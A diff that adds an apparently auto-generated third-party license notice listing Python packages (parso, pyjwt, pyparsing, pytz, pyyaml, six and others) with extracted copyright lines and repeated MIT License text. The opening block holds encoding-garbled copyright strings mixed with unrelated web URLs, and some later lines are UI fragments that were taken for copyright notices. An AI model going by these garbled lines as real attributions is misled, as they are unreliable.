+(c) IAOAiPS!O ODEyAaEu iOU?-uAED1/2o OeuAACAEa!P http://blogbus.com/blogbus/blog/diary.php?diaryid
+(c) c@ http://www.businessnetwork.co.jp/HTM/i-4.html http://www.businessnetwork.co.jp/HTM/i-4.html
+(c) PS CUP3O?'OssuAOOuUO IOUEO+-3/4IiEUE1OAATMIocuAE'Au http://www.acnnewswire.net/Article.Asp?lang
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 Python Software Foundation
+(c) cAFeedBurnerdgA1/2RSSzMEI AYUu1/2BSubscribe3eAeuI http://feeds.feedburner.com/BragZakatoHeadline
+(c) ?A$?I1/4Pedegi$?I EAI,oEaY iY $?Y o http://www.aivy.co.jp/BLOG_TEST/kobakoba/archives/003047.html
+(c) AaAaEC/EC/uAPIIAPS!OaAiAaeN A1/4+-ouA!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php
+(c) uAAa NAEoOuOE1/4th thInAEPS!?EOOE1OAxO1/4oOoAuIaooxo http://www.coverer.com/archives/000835.shtml
+Copyright (c) 1993-2000 by Gerry Murray, Silvano Balemi, Jon Dixon, Peter N'uchter, Juergen von Hagen
+(c) ?IuAAE1/2aPS!Eu3/4I2 auA3oOaNuuA1/2aUAE!PS ?? http://www.blogbus.com/blogbus/blog/index.php?blogid
+Copyright (c) 2006-2009 Hampton Catlin, Natalie Weizenbaum, and Chris Eppstein // http://sass-lang.com
+Copyright (c) 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc.
+Copyright 2007-2008 Waylan Limberg (http://achinghead.com/) and Seemant Kulleen (http://www.kulleen.org/)
+copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
+(c) EAE$?a$?AE,'$?1/2P H http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID 108673 2005
+(c) aB!xIa$??aAAElA1/2C/E YNid eAEC/$?IA$??I1/4eAA1/4eIFlaWUeAEC/$? IXOBsA1/2II http://r.gnavi.co.jp/g002234
+(c) authors@template-toolkit.ru http://forum.template-toolkit.ru/view_topic/topic_id-93.html Template Toolkit
+(c) authors@template-toolkit.ru http://forum.template-toolkit.ru/view_topic/topic_id-99.html Template Toolkit
+(c) OA1au$?yaoSSU u!nEr redete mit dem Vieh, den Vogeln und den Fischen King Solomon's Ring ^AP King Solomon's
+Copyright Angel Marin, Paul Johnston 2000 - 2009. Other contributors Greg Holt, Andrew Kepert, Ydnar, Lostinet
+(c) MSSUao$?ssAEFSSe(r)g!CSanwenji !O'2$?aPdegao'P3q,U /u1/4gak(3o,I!U$?FAn1/2O)!C http://sanwenji.blogspot.com
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 Python Software Foundation
+(c) PaOOOON-APSE1/2!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/304.htm
+Copyright Tiago Serafim (https://www.tiagoserafim.com/). copyright f'2004- date.today().year, NetworkX Developers
+(c) !x$?E$?$?$?A$??$?I$? <$?a$? $?i$?E$?$?!PS /> http://www.city.kyoto.jp/somu/rekishi/fm/ishibumi/html/sa043.html
+(c) ,, 1/43/4AI(Berkman Center for Internet & Society)?!1/4 AO+-U title http://cyber.law.harvard.edu/home/home?func
+(c) OAAauAblogPS!u < > ECEuODa-AAOssP1/4P(r)uAE1 http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+copyright rules http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050527_google.shtml
+(c) Copyright 2006 Salvatore Filippone University of Rome Tor Vergata $ Alfredo Buttari University of Rome Tor Vergata
+Copyright 2012 by Luis Majano and Ortus Solutions, Corp www.gocontentbox.org www.luismajano.com www.ortussolutions.com
+(c) PS!OaeEae th!PSxoIi?aE1/43oAA1/4uAoONPS! 1/2nIiEY +-+-'o!PS http://www.blogcn.com/User3/luciferwang/blog/27037020.html
+(c) PSoOD http://wiki.planetoid.info/index.php/WikiWiki WikiWiki IoA?oI http://wiki.planetoid.info/index.php/WikiWatchList
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 Python Software Foundation
+(c) cou1/2t erIYeJnBaeI Y^ae@ThIeOfW^ uAEC/AEC/$?+-AEAEA http://www.amazon.co.jp/exec/obidos/ASIN/B000B4NMUA/tamuyoudiary-22/ref
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 Python Software Foundation
+Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2003, 2004, 2005 Copyright (c) 2009 The R Foundation for Statistical Computing ISBN
+Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 Free Software Foundation, Inc.
+Copyright (c) 2005 Fernando Perez <fperez@colorado.edu> Brian E Granger <ellisonbg@gmail.com> Benjamin Ragan-Kelley <benjaminrk@gmail.com>
+(c) 1/2cEC/uA http://ann.269ch.jp/archives/2005/12/google_20.html n$?cLAiDuO B http://ken2-jp.cocolog-nifty.com/kenken/2005/12/google_cb13.html
+(c) AE!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/306.htm 1/2cAae1$?3/4ss /a a http://www.softsea.net/cat/30602.htm
+(c) 1/2oDDOth2OIO br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/305.htm IuI31UAi /a a http://www.softsea.net/cat/30514.htm
+(c) assAAaaE AoI~AEEeUu1/2B http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html
+(c) c AgI(r) I135.4A242.9Au1/2B http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html
+(c) PS!+-iIO3oE !PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/303.htm IuI3OoC? /a a http://www.softsea.net/cat/30390.htm
+(c) 1n2n?Th1/2n'U$?E$?A$?$?$?AE !C/ http://www.aozora.gr.jp/cards/001166/card43728.html ?Th1/2n'UE!3U2degIA !C/ http://www.aozora.gr.jp/cards/001166/card43729.html
+(c) xi'ouA+-PS $?,uEuEuEuE... br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/303.htm IuI3OoC? /a a http://www.softsea.net/cat/30305.htm
+(c) PaOOxa2EEi1/4thIOOEOOA!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/309.htm 1/4OIY DYID /a a http://www.softsea.net/cat/30912.htm
+(c) 3PS1ae1/4AEEa u2Ux/xOP- -1/2oDDIaA?uAuA3IDo br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/305.htm IuI31UAi /a a http://www.softsea.net/cat/30506.htm
+(c) AaAaEC/EC/uAPIIAPS!OaAiAaeN A1/4+-ouA!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php Wiki 1/4o1/2e ! ?EOO2I?1/4!PSOU!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php
+(c) !C/ http://www.aozora.gr.jp/cards/001166/card43723.html !OE21/2n tha!x$?I1/2D,1/2 !C/ http://www.aozora.gr.jp/cards/001166/card43724.html A,$?Th$?iEN$?A$??AOoaIY uU !C/ http://www.aozora.gr.jp/cards/001166/card43726.html
+(c) Ae,A !x$?I!C/E!oI!uE$?E$?e$?eEYIo$?C$?C/$?e!PSY EY $?Y e!O http://www.aozora.gr.jp/cards/000009/card45340.html degA1aeEnAESS?I$?IAEae !x$?IEYIo1/4O$?I!C/ deg3/4a+-/ANuE!E http://www.aozora.gr.jp/index_pages/person726.html
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card4715.html ,D,/Ac+-AE !x!C/IU21/4IYAIo!O http://www.aozora.gr.jp/cards/000120/card4702.html uthoaE1, <I? !x!C/IU21/4Io,1/4!O http://www.aozora.gr.jp/cards/000526/card4702.html'>
+(c) !E$?a$?A$?i$?odegaAA OAE$?ss'1$?'$?aIae$?A$?+-$?E!E $?E$?a!C/$?a$?A$?i$?o CoU$?u$?i$?AE$?$?$?e1/4I??$?IAae$?C$?a2 o1/2$?E'O$?1$?e$?a$?I$?I$?a$?A$?i$?o+-oA/$?C$?I$?E$?$?!PSCdeg$?I$??$?a!PS... http://blog.livedoor.jp/safe_food_of_asia
+(c) 2E$?I OP! !E!C/AIEO21$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000020/card44722.html E1/4 I$?E1/2/IY !E!C/E!AA+-N O$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000057/card43276.html 3/4a$?IE3/4A,3P !E!C/,PI+-'i$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000293/card4680.html
+1/4o1/2e ! ?EOO2I?1/4!PSOU!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php <https://web.archive.org/web/20140626004012/http://www.picloud.com/> Nathaniel Gray <n8gray@caltech.edu> Fernando Perez <fperez@colorado.edu> Copyright 2010, Gael Varoquaux 2001-2004, Fernando Perez 2001 Nathaniel Gray
+(c) !C/ http://www.aozora.gr.jp/cards/000160/card3344.html AEEEUAU3/4aI oiAi !C/ http://www.aozora.gr.jp/cards/000160/card3342.html $?I$?i$?I$?iE$?AAE$?IPAdegU !C/ http://www.aozora.gr.jp/cards/000160/card3345.html oPSAI$?D$?E$? Eu1cE1/4AA !C/ http://www.aozora.gr.jp/cards/000160/card3347.html Ai thI11O3o !C/ http://www.aozora.gr.jp/cards/000160/card3346.html
+(c) !x!C/!O http://www.aozora.gr.jp/cards/000160/card3344.html AEEEUAU3/4aI oiAi !x!C/!O http://www.aozora.gr.jp/cards/000160/card3342.html $?I$?i$?I$?iE$?AAE$?IPAdegU !x!C/!O http://www.aozora.gr.jp/cards/000160/card3345.html oPSAI$?D$?E$? Eu1cE1/4AA !x!C/!O http://www.aozora.gr.jp/cards/000160/card3347.html Ai thI11O3o !x!C/!O http://www.aozora.gr.jp/cards/000160/card3346.html
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+parso 0.8.3 - MIT
+
+
+Copyright (c) <2013-2017>
+Copyright 2006 Google, Inc.
+Copyright (c) 2010 by Armin Ronacher.
+Copyright David Halter and Contributors
+Copyright 2004-2005 Elemental Security, Inc.
+Copyright 2014 David Halter and Contributors
+Copyright (c) 2014-2016 Ian Lee <IanLee1521@gmail.com>
+Copyright (c) 2017-???? Dave Halter <davidhalter88@gmail.com>
+Copyright (c) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
+Copyright 2010 by Armin Ronacher. :license Flask Design License
+Copyright (c) 2009-2014 Florent Xicluna <florent.xicluna@gmail.com>
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 Python Software Foundation
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pathlib2 2.3.6 - MIT
+
+
+Copyright (c) 2014-2017 Matthias C. M. Troffaes
+Copyright (c) 2012-2014 Antoine Pitrou and contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pickleshare 0.7.5 - MIT
+
+
+Copyright (c) 2016 Ville Vainio
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+py 1.11.0 - MIT
+
+
+copyright u'2010
+(c) Ronny Pfannschmidt, Holger Krekel
+(c) Holger Krekel and others, 2004-2014
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pyjwt 2.3.0 - MIT
+
+
+copyright 2015, Jose Padilla
+Copyright (c) 2015 Jose Padilla
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pyparsing 3.0.6 - MIT
+
+
+Copyright 2004-2010
+Copyright Paul McGuire
+Copyright 2004, Paul McGuire
+Copyright 2006, Paul McGuire
+Copyright 2008, Paul McGuire
+Copyright 2010, Paul McGuire
+Copyright 2011, Paul McGuire
+Copyright 2015, Paul McGuire
+Copyright 2016, Paul McGuire
+Copyright 2018, Paul McGuire
+Copyright 2019, Paul McGuire
+Copyright Paul McGuire, 2019
+copyright 2006, Paul McGuire
+Copyright 2008 Chris Lambrou.
+Copyright, 2010, Paul McGuire
+Copyright 2007 by Paul McGuire
+Copyright, 2007 - Paul McGuire
+Copyright, 2012 - Paul McGuire
+Copyright 2006, by Paul McGuire
+Copyright 2008, by Paul McGuire
+Copyright 2012, Paul T. McGuire
+Copyright (c) 2003, Paul McGuire
+Copyright (c) 2004, Paul McGuire
+Copyright (c) 2006, Paul McGuire
+Copyright (c) 2009 Zarko Zivanov
+Copyright (c) 2016, Paul McGuire
+Copyright 2010,2019 Paul McGuire
+Copyright, 2006, by Paul McGuire
+Copyright 2005-2006, Paul McGuire
+Copyright 2009, 2011 Paul McGuire
+Copyright (c) 2018 Paul T. McGuire
+Copyright Ellis & Grant, Inc. 2005
+Copyright 2003-2019 by Paul McGuire
+Copyright 2011,2015 Paul T. McGuire
+Copyright (c) 2003,2019 Paul McGuire
+Copyright (c) 2006,2016 Paul McGuire
+Copyright 2003, 2019 by Paul McGuire
+Copyright 2004-2016, by Paul McGuire
+Copyright 2007-2011, by Paul McGuire
+Copyright 2010, 2019 by Paul McGuire
+Copyright 2012, 2019 Paul T. McGuire
+Copyright (c) 2003,2016, Paul McGuire
+Copyright (c) 2004, 2006 Paul McGuire
+Copyright (c) 2004-2016, Paul McGuire
+Copyright (c) 2006, 2016, Paul McGuire
+Copyright (c) 2006, 2019, Paul McGuire
+Copyright (c) 2004-2011 Paul T. McGuire.
+Copyright (c) 2006, Estrate, the Netherlands
+Copyright 1989 by Carnegie Mellon University
+Copyright (c) 2006 Tim Cera timcera@earthlink.net
+Copyright Petri Savolainen <firstname.lastname@iki.fi>
+Copyright 2004, by Alberto Santini http://www.albertosantini.it/chess
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pyrsistent 0.18.0 - MIT
+
+
+Copyright (c) 2013 Matthew Rocklin
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pytz 2021.3 - MIT
+
+
+Copyright (c) 2003-2019 Stuart Bishop <stuart@stuartbishop.net>
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pywinpty 1.1.6 - MIT
+
+
+Copyright (c) 2017 Spyder IDE
+Copyright (c) 2017- Spyder Project
+Copyright (c) 2005-2009, Jochen Kalmbach
+Copyright (c) 2005-2013, Jochen Kalmbach
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pyyaml 6.0 - MIT
+
+
+Copyright (c) 2006-2016 Kirill Simonov
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+readthedocs-sphinx-ext 2.1.4 - MIT
+
+
+copyright u'2015
+Copyright (c) 2010-2019 Read the Docs, Inc & contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+six 1.16.0 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+sphinx-rtd-theme 1.0.0 - MIT
+
+
+(c) Droits d'auteur
+(copyright)s. (c) Prawa
+(copyright)s. (c) Autori
+Copyright Downloads Edit
+(copyright)s. (c) Derechos
+(copyright)s. (c) Direitos
+Copyright Dave Gandy 2016.
+Copyright Downloads Bewerk
+Copyright Downloads Editar
+Copyright (copyright)s. Apie
+Copyright (copyright)s. Over
+Copyright Downloads Modifica
+Copyright (copyright)s. About
+Copyright (c) 2019 ORGANIZATION
+(copyright)s. (c) Droits d'auteur
+Copyright 2007-2013 by the Sphinx team
+Copyright Auf Bitbucket bearbeiten Auf GitHub
+Copyright (c) 2010-2015, Lukasz Dziedzic (dziedzic@typoland.com)
+Copyright (copyright)s. Nota sulla documentazione Realizzato con
+Copyright (c) 2013-2018 Dave Snider, Read the Docs, Inc. & contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
